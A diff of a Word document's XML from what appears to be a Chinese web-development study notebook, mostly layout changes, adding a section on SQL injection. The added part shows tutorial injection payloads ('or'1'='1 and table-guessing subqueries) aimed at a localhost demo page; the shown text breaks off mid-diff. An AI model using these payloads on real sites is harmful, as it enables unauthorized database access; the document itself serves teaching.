-        </w:rPr>
-        <w:t>$avg,$first,$last,$max,$min,$sum</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>等。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>$project</w:t>
       </w:r>
       <w:r>
@@ -20564,7 +20791,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="3013710" cy="5732780"/>
@@ -20695,6 +20921,7 @@
         <w:widowControl/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>{ "category": 1, "item": 1 }</w:t>
       </w:r>
     </w:p>
@@ -20864,7 +21091,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>面向服务架构SOA</w:t>
       </w:r>
     </w:p>
@@ -22091,6 +22317,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>单一职责原则</w:t>
       </w:r>
       <w:r>
@@ -22121,7 +22348,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>开放封闭原则</w:t>
       </w:r>
       <w:r>
@@ -23122,7 +23348,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Expires</w:t>
       </w:r>
       <w:r>
@@ -23375,6 +23600,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">s-maxage: </w:t>
       </w:r>
       <w:r>
@@ -24245,7 +24471,6 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5269230" cy="3714750"/>
@@ -24491,6 +24716,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>1</w:t>
       </w:r>
       <w:r>
@@ -26413,7 +26639,6 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>既然是缓存，就注定了它的资源是有限的，宝贵的，也就注定了我们必须合理利用它的内存空间，也就被迫的让我们清楚的认识到热点数据，不易修改的应该放在缓存，反之不宜放。</w:t>
       </w:r>
     </w:p>
@@ -26674,6 +26899,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>软件架构</w:t>
       </w:r>
     </w:p>
@@ -27500,7 +27726,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>CoreCLR</w:t>
       </w:r>
     </w:p>
@@ -27857,6 +28082,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>有IP确定服务器，请求到达这个地址（服务器）后，再由端口确定进程，由服务器对应的进程处理，在windows server服务器是由一个名为HTTP.SYS服务来接受http请求。</w:t>
       </w:r>
     </w:p>
@@ -28171,6 +28397,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4905375" cy="3552825"/>
@@ -28521,9 +28748,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -28850,7 +29074,6 @@
           <w:color w:val="4F4F4F"/>
           <w:kern w:val="0"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">　　·Application_End：在HttpApplication 类的最后一个实例被销毁时，该事件被触发。在一个应用程序的生命周期内它只被触发一次。</w:t>
       </w:r>
     </w:p>
@@ -28893,6 +29116,7 @@
           <w:color w:val="4F4F4F"/>
           <w:kern w:val="0"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">　　·Application_EndRequest：针对应用程序请求的最后一个事件。</w:t>
       </w:r>
     </w:p>
@@ -29253,7 +29477,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>IIs</w:t>
       </w:r>
       <w:r>
@@ -29674,6 +29897,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>OWIN</w:t>
       </w:r>
       <w:r>
@@ -30477,7 +30701,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>核心：公共语言基础（</w:t>
       </w:r>
       <w:r>
@@ -31268,6 +31491,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="4571365" cy="3218815"/>
@@ -31336,7 +31560,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5085715" cy="3704590"/>
@@ -31703,6 +31926,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>建立或解除与其它接点的联系</w:t>
       </w:r>
     </w:p>
@@ -32133,7 +32357,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Authorization</w:t>
       </w:r>
       <w:r>
@@ -33365,6 +33588,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -33383,17 +33607,7 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">application/x-www-form-urlencoded 和 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Courier New"/>
-          <w:color w:val="0070C0"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">multipart/form-data </w:t>
+        <w:t xml:space="preserve">application/x-www-form-urlencoded 和 multipart/form-data </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -34342,7 +34556,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>CSS Sprites</w:t>
       </w:r>
       <w:r>
@@ -34883,6 +35096,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>用</w:t>
       </w:r>
       <w:r>
@@ -35889,7 +36103,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>App_GlobalResources</w:t>
       </w:r>
       <w:r>
@@ -36886,6 +37099,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Debug</w:t>
       </w:r>
     </w:p>
@@ -37358,7 +37572,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>把任意长的输入消息串变化成固定长的输出串且由输出串难以得到输入串的一种函数，用于产生消息摘要，密钥加密</w:t>
       </w:r>
     </w:p>
@@ -38217,6 +38430,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Web安全</w:t>
       </w:r>
     </w:p>
@@ -38248,6 +38462,9 @@
           <w:numId w:val="103"/>
         </w:numPr>
         <w:ind w:left="900"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -38357,6 +38574,3958 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>SQL注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>所谓</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>注入，就是通过把</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>命令插入到</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:t>表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>命令</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>假设我们在浏览器中输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，由于它只是对页面的简单请求无需对数据库动进行动态请求，所以它不存在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，当我们输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>时，我们在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中传递变量</w:t>
+      </w:r>
+      <w:r>
+        <w:t>testid</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，并且提供值为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>23</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，由于它是对数据库进行动态查询的请求（其中</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?testid</w:t>
+      </w:r>
+      <w:r>
+        <w:t>＝</w:t>
+      </w:r>
+      <w:r>
+        <w:t>23</w:t>
+      </w:r>
+      <w:r>
+        <w:t>表示数据库查询变量），所以我们可以该</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中嵌入恶意</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>语句。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>现在我们要通过页面请求的方式，让数据库执行我们的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>语句，我们要在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中嵌入恶意表达式</w:t>
+      </w:r>
+      <w:r>
+        <w:t>1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>（或</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2=2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>等等），如下</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>所示：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>jobid=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>'or'1'='1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:spacing w:line="340" w:lineRule="exact"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:noProof/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3861186" cy="2378691"/>
+            <wp:effectExtent l="19050" t="0" r="5964" b="0"/>
+            <wp:docPr id="18" name="图片 17" descr="201201010828028321.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="201201010828028321.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId44" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3864684" cy="2380846"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:noProof/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3821430" cy="4299110"/>
+            <wp:effectExtent l="19050" t="0" r="7620" b="0"/>
+            <wp:docPr id="26" name="图片 25" descr="201201010828054435.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="201201010828054435.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId45" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3825917" cy="4304158"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>现在我们把</w:t>
+      </w:r>
+      <w:r>
+        <w:t>job</w:t>
+      </w:r>
+      <w:r>
+        <w:t>表中的所有数据都查询出来了，仅仅通过一个简单的恒真表达式就可以进行了一次简单的攻击。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>虽然我们把数据都查出来了，但数据并没有太大的价值，接着我们再确定下数据库的表名。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+      </w:pPr>
+      <w:r>
+        <w:t>首先我们假设表名就是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>job</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，然后输入以下</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rStyle w:val="a6"/>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:szCs w:val="18"/>
+          <w:u w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:color w:val="FF0000"/>
+          </w:rPr>
+          <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a6"/>
+          <w:color w:val="FF0000"/>
+          <w:szCs w:val="18"/>
+          <w:u w:val="none"/>
+        </w:rPr>
+        <w:t>1=(select count(*) from job)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a6"/>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:szCs w:val="18"/>
+          <w:u w:val="none"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2155190"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="27" name="图片 26" descr="201201010828089122.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="201201010828089122.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId47" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2155190"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>当我们输入了以上</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>后，结果服务器返回我们错误信息，这证明了我们的假设是错误的，那我们该感觉到挫败吗？不，其实这里返回了很多信息，首先它证明了该表名不是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>job</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，而且它还告诉我们后台数据库是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL Server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，不是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>或</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Oracle</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，这也设计一个漏洞把错误信息直接返回给了用户。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t>接下假定表名是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>jobs</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，然后输入以下</w:t>
+      </w:r>
+      <w:r>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId48" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:color w:val="FF0000"/>
+            <w:szCs w:val="18"/>
+            <w:u w:val="none"/>
+          </w:rPr>
+          <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or1=(select</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:color w:val="FF0000"/>
+            <w:u w:val="none"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:color w:val="FF0000"/>
+            <w:szCs w:val="18"/>
+            <w:u w:val="none"/>
+          </w:rPr>
+          <w:t xml:space="preserve">count(*) from jobs) </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:color w:val="FF0000"/>
+            <w:u w:val="none"/>
+          </w:rPr>
+          <w:t>--</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2239645"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="28" name="图片 27" descr="201201010828095925.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="201201010828095925.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId49" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
